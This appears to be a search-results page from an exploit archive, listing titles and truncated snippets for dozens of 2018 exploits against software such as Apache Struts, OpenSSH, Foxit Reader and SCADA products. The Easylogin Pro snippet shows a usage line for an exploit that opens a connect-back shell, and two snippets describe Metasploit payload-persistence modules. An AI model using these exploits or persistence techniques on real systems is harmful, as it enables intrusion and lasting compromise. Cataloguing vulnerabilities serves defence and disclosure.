39001 matches found
Seagate Personal Cloud SRN21C SQL Injection Vulnerability
Seagate Personal Cloud model SRN21C running firmware versions 4.3.16.0 and 4.3.18.0 suffer from remote SQL injection vulnerabilities in the media server. ------------------------------------------------------------------------ Seagate Media Server multiple SQL injection vulnerabilities...
PCViewer vt1000 - Directory Traversal Vulnerability
Exploit for windows platform in category web applications Exploit Title: PCViewer vt1000 - Directory Traversal Exploit Author: Berk Dusunur Vendor Homepage: N/A Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml Affected Version: vt1000 Tested on: Parrot OS CVE : N...
Foxit PDF Reader 9.0.1.1049 Pointer Overwrite Use-After-Free Exploit
Foxit PDF Reader version 9.0.1.1049 has a use-after-free vulnerability in the Text Annotations component and the TypedArray's use uninitialized pointers. The vulnerabilities can be combined to leak a vtable memory address, which can be adjusted to point to the base address of the executable. A RO...
Apache Struts 2.x Remote Code Execution Vulnerability
Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities. CVEID:CVE-2018-11776 PRODUCT:Apache Struts VERSION:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16 PROBLEMTYPE:Remote Cod...
StyleWriter 4 1.0 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: StyleWriter 4 1.0 - Denial of Service PoC Author: Gionathan "John" Reale Homepage: http://www.editorsoftware.com Software Link: http://www.editorsoftware.com/StyleWriterDownload.php Tested Version: 1.0 Tested on OS: Windows 7 32-bi...
SkypeApp 12.8.487.0 - Cuenta de Skype o Microsoft Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: https://www.skype.com/es/home/ Tested Version: 12.8.487.0 Vulnerability Type: Denial of Service DoS Local Tested...
CuteFTP 8.3.1 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title : CuteFTP 8.3.1 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Vendor Homepage : http://www.cuteftp.com/ Software Link Download : https://filehippo.com/downloadcuteftppro/4518/ Tested on : Windows 10 -...
Geutebrueck re_porter 7.8.974.20 - Credential Disclosure Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version:...
Geutebrueck re_porter 16 - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Geutebrueck reporter 16 - Cross-Site Scripting Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prior...
Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation Exploit
Exploit for windows platform in category local exploits SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 2017 Summary The Diagnostics Hub...
Softdisk 3.0.3 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Softdisk 3.0.3 - Denial Of Service PoC Author: Gionathan "John" Reale Homepage: http://www.ezbsystems.com/ Software Link: https://www.ezbsystems.com/softdisc/download.htm Tested Version: 3.0.3 Tested on OS: Windows 7 32-bit Steps t...
Textpad 7.6.4 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Textpad 7.6.4 - Denial Of Service PoC Author: Gionathan "John" Reale Homepage: https://textpad.com Software Link: https://textpad.com/download/v76/win32/txpeng764-32.zip Tested Version: 7.6.4 Tested on OS: Windows 7 32-bit Steps to...
Easyboot 6.6.0 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Easyboot 6.6.0 - Denial Of Service PoC Author: Gionathan "John" Reale Homepage: http://www.ezbsystems.com/ Software Link: http://www.ezbsystems.com/easyboot/download.htm Tested Version: 6.6.0 Tested on OS: Windows 7 32-bit Steps to...
UltraISO 9.7.1.3519 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Vendor Homepage : https://www.ultraiso.com Software Link Download : https://www.ultraiso.com/download.html Tested on : Windows 10 - 64-b...
Ghostscript - Multiple Vulnerabilities
Exploit for linux platform in category local exploits http://seclists.org/oss-sec/2018/q3/142 These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools. ---- Hello, this was discussed on the distros list, but it was suggested t...
KingMedia 4.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: KingMedia 4.1 - Remote Code Execution Author: Efren Diaz Software: KingMedia Version: 1.x, 2.x, 3.x, 4.1 Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877 CVE: N/A \n\n"; echo " -target:...
Hikvision IP Camera 5.4.0 - User Enumeration Exploit
Exploit for hardware platform in category remote exploits Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530 DS-2CD2xx0F-I...
Wordpress Ninja Forms 3.3.13 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection Exploit Author: Mostafa Gharzi Website: https://www.certcc.ir Vendor: The WP Ninjas Software Link: https://wordpress.org/plugins/ninja-forms/ Affected Version: 3.3.13 and befor...
Twitter-Clone 1 - userid SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 POC : SQLi vulnerable files : follow.php , index.php vulnerable...
Project64 2.3.2 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Project64 2.3.2 - Denial Of Service PoC. Author: Gionathan "John" Reale Homepage: https://www.pj64-emu.com Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows 7 32-bit Steps ...
Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post) Vulnerability
Exploit for php platform in category web applications Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was discovered in...
OpenSSH 7.7 - Username Enumeration Exploit
Exploit for linux platform in category remote exploits Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473 / \ / / | | | | | | | | | | | || | | |...
Project64 2.3.2 - Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits Exploit Title: Project64 2.3.2 - Local BufferOverflow SEH Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows XP...
ZyXEL VMG3312-B10B - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting Exploit Author: Samet ŞAHİN Vendor Homepage: https://www.zyxel.com/ Software Link: ftp://ftp.zyxel.com.tr/ZyXELURUNLERI/MODEMLER/VDSLMODEMLER/VMG3312-B10B/ Version: ZyXEL VMG3312-B1...
Zortam MP3 Media Studio 23.95 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on OS: Windows 7 x64 Steps to...
Easylogin Pro 1.3.0 - Unserialize Remote Code Execution Exploit
Exploit for php platform in category remote exploits !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- email protected:$ ./e.php -t...
Autostart Desktop Item Persistence Exploit
This Metasploit module will create an autostart entry to execute a payload. The payload will be executed when the users logs in. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Autostart Deskto...
BMC MyIT Java System Solutions SSO Plugin 4.0.13.1 Cross Site Scripting Vulnerability
Exploit for java platform in category web applications Title: ====== Reflected XSS in Java System Solutions SSO Plugin 4.0.13.1 for BMC MyIT Description: ============ Reflected Cross-Site Scripting in Java System Solutions' BMC MyIT SSO Plugin version 4.0.13.1 was identified during a penetration...
WordPress Chained Quiz 1.0.8 Plugin - answer SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched Version:...
Prime95 29.4b7 - Denial Of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS: Windows 7 32-bit...
Countly - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Countly-server StoredPersistent XSS Vulnerability Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested on: GNU/Linux Ubuntu 16.04 -...
SEIG Modbus 3.4 - Remote Code Execution Exploit
Exploit for windows platform in category remote exploits Title: SEIG Modbus 3.4 - Remote Code Execution Author: Alejandro Parodi Vendor Homepage: https://www.schneider-electric.com Software Link:...
SEIG Modbus 3.4 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Vendor Homepage: https://www.schneider-electric.com Software Link:...
WordPress Tagregator 0.6 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Exploit Author: ManhNho Vendor Homepage: https://wordpress.org/plugins/tagregator/ Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip Ref:...
SEIG SCADA System 9 - Remote Code Execution Exploit
Exploit for windows platform in category remote exploits Title: SEIG SCADA SYSTEM 9 - Remote Code Execution Author: Alejandro Parodi Vendor Homepage: https://www.schneider-electric.com Software Link:...
Restorator 1793 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS: Windows 7 x64...
Linux rc.local Payload Persistence Module Exploit
This Metasploit module will edit /etc/rc.local in order to persist a payload. The payload will be executed on the next reboot. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'rc.local...
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu 18.04 1. Description: The...
Xen xen-netback xenvif_set_hash_mapping Integer Overflow Exploit
Exploit for multiple platform in category dos / poc Xen: integer overflow in xen-netback xenvifsethashmapping The xen-netback linux kernel module is the default backend for Xen's virtual network devices. Since commit 40d8abdee806d496a60ee607a6d01b1cd7fabaf0 the backend supports an additional...
OpenSSH 2.3 < 7.4 - Username Enumeration Exploit
Exploit for linux platform in category remote exploits !/usr/bin/env python Copyright c 2018 Matthew Daley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files the "Software", to deal in the Software without restriction,...
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion Explo
Exploit for windows platform in category dos / poc / The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the oth...
Jetty 6.1.6 Cross Site Scripting Vulnerability
Exploit for jsp platform in category web applications Title: Jetty 6.1.6 Cross-Site Scripting Author: email protected - https://crowdshield Software Link: http://www.mortbay.org/jetty/ Tested on: Jetty 6.1.6 other versions may also be vulnerable CVE: N/A Background: Jetty 6.1.6 is vulnerable to...
Yubico PIV Tool 1.5.0 Buffer Overflow Vulnerability
A buffer overflow and an out of bounds memory read were identified in the yubico-piv-tool-1.5.0, these can be triggered by a malicious token. Multiple Vulnerabilities in Yubico Piv ====================================== Overview - -------- Confirmed Affected Versions: 1.5.0 Confirmed Patched...
Yubico 0.1.9 libykneomgr Out Of Bounds Read / Write Vulnerability
Yubico version 0.1.9 libykneomgr suffers from out of bounds read and write vulnerabilities. Multiple Vulnerabilities in Yubico libykneomgr ============================================== Overview - -------- Confirmed Affected Versions: 0.1.9 Confirmed Patched Versions: - Vendor: Yubico / Depreciat...
Microsoft Edge Chakra JIT - InlineArrayPush Type Confusion Exploit
Exploit for windows platform in category dos / poc / This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemIA instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type...
Microsoft Edge Chakra JIT - DictionaryPropertyDescriptor::CopyFrom Type Confusion Exploit
Exploit for windows platform in category dos / poc / Here's the method. template template void DictionaryPropertyDescriptor::CopyFromDictionaryPropertyDescriptor& descriptor this-Attributes = descriptor.Attributes; this-Data = descriptor.Data == DictionaryPropertyDescriptor::NoSlots ? NoSlots :...
Apple Smart Card Services Memory Corruption Vulnerability
Attackers with local access can exploit security issues in the smartcard driver. These result in memory corruptions, which might lead to code execution. Since smartcards can be used for authentication, the vulnerabilities may allow an attacker to login to the system without valid credentials as a...
CEWE Photoshow 6.3.4 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service PoC Author: Gionathan "John" Reale Homepage: https://cewe-photoworld.com/ Software Link: https://cewe-photoworld.com/creator-software/windows-download Tested Version: 6.3.4 Tested on OS:...
OpenSC 0.18.0 Buffer Overflow / Out Of Bounds Read Vulnerability
Multiple issues have been identified in OpenSC, ranging from stack based buffer overflows to out of bounds reads and writes on the heap. They can be triggered by malicious smartcards sending malformed responses to APDU commands. Additionally to those fixes reported here, a lot of minor issues eg...
Easy RM To MP3 Converter 2.6 Stack Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title : Easy Rm to Mp3 Convertor Author = Mr.0&1IRIH email protected Version = 2.6 Tested On windows 7 32 bit Ultimate Tested On windows Vista 32 bit Tested On windows Xp SP3 Previous Exploits do NOT work on windows & versions. This...